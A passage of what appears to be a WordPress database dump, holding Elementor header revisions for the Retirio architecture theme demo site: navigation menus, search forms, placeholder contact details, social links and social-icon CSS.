      		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 1','','inherit','closed','closed','','4492-revision-v1','','','2022-06-07 06:47:56','2022-06-07 06:47:56','',4492,'https://bauhaus.futuremediatrix.com/?p=4615',0,'revision','',0),(4616,1,'2022-06-07 07:05:50','2022-06-07 07:05:50','<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/ZVfpkGDfAhHGSeGJ6\">30 Commercial Road Fratton, Australia</a>								</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					Mon - Sat: 8.00 am - 7.00 pm																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 2','','inherit','closed','closed','','51-revision-v1','','','2022-06-07 07:05:50','2022-06-07 07:05:50','',51,'https://bauhaus.futuremediatrix.com/?p=4616',0,'revision','',0),(4617,1,'2022-06-07 07:25:33','2022-06-07 07:25:33','Call anytime						\n					<ul>\n								<li>\n																					<a href=\"tel:+23425446680 \">\n													+23 425 4466 80												</a>\n																			</li>\n											</ul>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							Send email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" 